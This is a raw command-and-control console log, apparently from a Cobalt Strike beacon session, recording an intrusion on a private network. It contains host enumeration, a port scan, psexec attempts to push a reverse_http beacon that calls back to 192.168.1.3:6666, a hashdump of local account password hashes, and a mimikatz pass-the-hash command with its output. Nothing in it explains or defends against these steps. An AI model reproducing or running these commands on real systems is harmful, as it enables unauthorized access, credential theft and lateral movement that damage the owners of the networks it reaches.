[+] established link to parent beacon: 192.168.1.2
beacon> net view
[*] Tasked beacon to run net view
[+] host called home, sent: 76344 bytes
[+] received output:
List of hosts:
[+] received output:
Server Name  IP Address    Platform  Version  Type  Comment
-----------  ----------    --------  -------  ----  -------
HEMA1        192.168.1.5   500       6.1
HEMA2        192.168.1.6   500       6.1
HEMA3        192.168.1.13  500       6.1
HEMA5        192.168.1.2   500       6.1
WTP-PC       192.168.1.12  500       6.1
beacon> portscan 192.168.1.12 1-1024,3389,5900-6000 none 1024
[*] Tasked beacon to scan ports 1-1024,3389,5900-6000 on 192.168.1.12
[+] host called home, sent: 75325 bytes
[+] received output:
192.168.1.12:139
192.168.1.12:135
[+] received output:
192.168.1.12:554
192.168.1.12:445
Scanner module is complete
beacon> psexec WTP-PC ADMIN$ http
[*] Tasked beacon to run windows/beacon_http/reverse_http (192.168.1.3:6666) on WTP-PC via Service Control Manager (\\WTP-PC\ADMIN$\99981.exe)
[+] host called home, sent: 14985 bytes
[-] could not upload file: 5
[-] Could not open service control manager on WTP-PC: 5
beacon> hashdump
[*] Tasked beacon to dump hashes
[+] host called home, sent: 64069 bytes
[+] received password hashes:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
wtp:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
beacon> rev2self
[*] Tasked beacon to revert token
beacon> pth HEMA5\Administrator 31d6cfe0d16ae931b73c59d7e0c089c0
[*] Tasked beacon to run mimikatz's sekurlsa::pth /user:Administrator /domain:HEMA5 /ntlm:31d6cfe0d16ae931b73c59d7e0c089c0 /run:"cmd.exe /c echo 1b932da7028 > \\.\pipe\ca907f" command
beacon> psexec WTP-PC ADMIN$ smb
[*] Tasked beacon to run windows/beacon_smb/bind_pipe (\\WTP-PC\pipe\status_7777) on WTP-PC via Service Control Manager (\\WTP-PC\ADMIN$\638e2.exe)
[+] host called home, sent: 679790 bytes
[+] Impersonated NT AUTHORITY\SYSTEM
[-] could not upload file: 1331
[-] Could not open service control manager on WTP-PC: 5
[-] Could not connect to pipe (\\WTP-PC\pipe\status_7777): 1331
[-] could not connect to pipe: 1331
[+] received output:
user : Administrator
domain : HEMA5
program : cmd.exe /c echo 1b932da7028 > \\.\pipe\ca907f
impers. : no
NTLM : 31d6cfe0d16ae931b73c59d7e0c089c0
| PID 3184
| TID 2212
| LSA Process is now R/W
| LUID 0 ; 19179194 (00000000:0124a6ba)
\_ msv1_0 - data copy @ 001C6B0C : OK !
\_ kerberos - data copy @ 001A8628
\_ aes256_hmac -> null
\_ aes128_hmac -> null
\_ rc4_hmac_nt OK
\_ rc4_hmac_old OK
\_ rc4_md4 OK
\_ rc4_hmac_nt_exp OK
\_ rc4_hmac_old_exp OK
\_ *Password replace -> null